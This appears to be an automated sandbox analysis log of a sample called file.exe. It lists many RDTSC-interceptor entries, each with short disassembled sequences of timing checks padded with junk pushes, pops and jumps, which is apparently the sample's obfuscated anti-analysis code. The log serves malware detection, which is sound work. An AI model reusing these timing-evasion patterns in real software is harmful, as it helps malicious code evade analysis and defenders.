Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F3818 second address: 13F3845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E419h 0x00000007 jmp 00007F0F0527E410h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F39A3 second address: 13F39E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F04CBD31Fh 0x0000000b jno 00007F0F04CBD322h 0x00000011 jmp 00007F0F04CBD31Eh 0x00000016 popad 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F39E0 second address: 13F39E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F39E4 second address: 13F39FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F414D second address: 13F4158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F42E4 second address: 13F42F5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F04CBD31Ch 0x00000008 jc 00007F0F04CBD316h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F42F5 second address: 13F42FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F4452 second address: 13F445F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F0F04CBD316h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F445F second address: 13F446E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F0F0527E406h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F446E second address: 13F4477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F4477 second address: 13F447D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F447D second address: 13F448F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F0F04CBD318h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F76FF second address: 13F7703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FA220 second address: 13FA22D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FA22D second address: 13FA238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FA38D second address: 13FA392 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FA392 second address: 13FA398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FDD36 second address: 13FDD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FDD3A second address: 13FDD4F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F0527E40Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE2CC second address: 13FE2D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE2D4 second address: 13FE2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE2DA second address: 13FE2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE2DE second address: 13FE30B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E410h 0x00000007 jmp 00007F0F0527E411h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1403D4A second address: 1403D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1403D54 second address: 1403D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E415h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14025C5 second address: 14025CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14025CD second address: 14025D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1402A31 second address: 1402A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1402A37 second address: 1402A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1402BC1 second address: 1402BF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F04CBD321h 0x0000000d pop edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0F04CBD322h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1402BF0 second address: 1402BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1402BF4 second address: 1402C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F0F04CBD31Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8A04 second address: 13B8A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8A0A second address: 13B8A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8A0E second address: 13B8A80 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ecx, dword ptr [ebp+122D38B0h] 0x0000000f mov ebx, dword ptr [ebp+1248DA6Eh] 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F0F0527E408h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov edx, dword ptr [ebp+122D37F8h] 0x00000035 add eax, ebx 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F0F0527E408h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 sub dword ptr [ebp+122D2AA3h], ecx 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a jno 00007F0F0527E406h 0x00000060 pop eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push ebx 0x00000064 pop ebx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8A80 second address: 13B8AD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F0F04CBD318h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D322Bh], ecx 0x0000002a push 00000004h 0x0000002c mov edi, dword ptr [ebp+122D3904h] 0x00000032 nop 0x00000033 jmp 00007F0F04CBD31Eh 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c jmp 00007F0F04CBD31Ch 0x00000041 pop ecx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1403A4A second address: 1403A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407A7E second address: 1407A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407116 second address: 1407127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0F0527E406h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407689 second address: 1407693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0F04CBD316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140DC3A second address: 140DC64 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F0527E406h 0x00000008 jne 00007F0F0527E406h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0F0527E418h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140DC64 second address: 140DC68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140DC68 second address: 140DC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140E77D second address: 140E781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140E781 second address: 140E785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140E785 second address: 140E790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140EA62 second address: 140EA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140EA66 second address: 140EA86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F0F04CBD318h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140EA86 second address: 140EA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F0527E40Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140ECEF second address: 140ECF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140F027 second address: 140F03C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0F0527E406h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F0F0527E406h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140F03C second address: 140F04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0F04CBD316h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140F04B second address: 140F068 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F0527E413h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140F312 second address: 140F320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136DF27 second address: 136DF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F0527E416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136DF43 second address: 136DF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136DF47 second address: 136DF4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141942E second address: 1419434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419434 second address: 141943E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0F0527E406h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419721 second address: 1419740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F0F04CBD316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jng 00007F0F04CBD328h 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419883 second address: 141988D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141988D second address: 1419893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419893 second address: 14198A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0F0527E406h 0x0000000a jne 00007F0F0527E406h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419BC7 second address: 1419BCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419D1A second address: 1419D25 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419FDD second address: 1419FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1419FE3 second address: 141A001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007F0F0527E406h 0x0000000e jmp 00007F0F0527E40Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1420A1D second address: 1420A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0F04CBD316h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1420A29 second address: 1420A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1420A2E second address: 1420A3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0F04CBD316h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141F870 second address: 141F875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141F875 second address: 141F891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F0F04CBD31Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141F891 second address: 141F8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0F0527E406h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141F8A2 second address: 141F8BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0F04CBD31Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141F8BB second address: 141F8E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E414h 0x00000007 jmp 00007F0F0527E413h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142A2A6 second address: 142A2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14371F9 second address: 14371FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14371FD second address: 143720D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F0F04CBD316h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 143720D second address: 1437216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1437216 second address: 143723F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0F04CBD316h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F0F04CBD31Eh 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a jns 00007F0F04CBD316h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 143723F second address: 143724A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144192B second address: 144192F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144192F second address: 144193D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0F0527E40Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144193D second address: 1441941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1449178 second address: 144917F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1452A35 second address: 1452A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jl 00007F0F04CBD316h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F04CBD321h 0x00000014 jno 00007F0F04CBD316h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1452A5B second address: 1452A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E415h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F0F0527E406h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1452A7E second address: 1452A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1451232 second address: 145123A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1451404 second address: 1451420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F04CBD31Ch 0x0000000d jnl 00007F0F04CBD318h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14517DA second address: 14517E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14517E3 second address: 14517FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14517FE second address: 1451804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1451804 second address: 145180A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
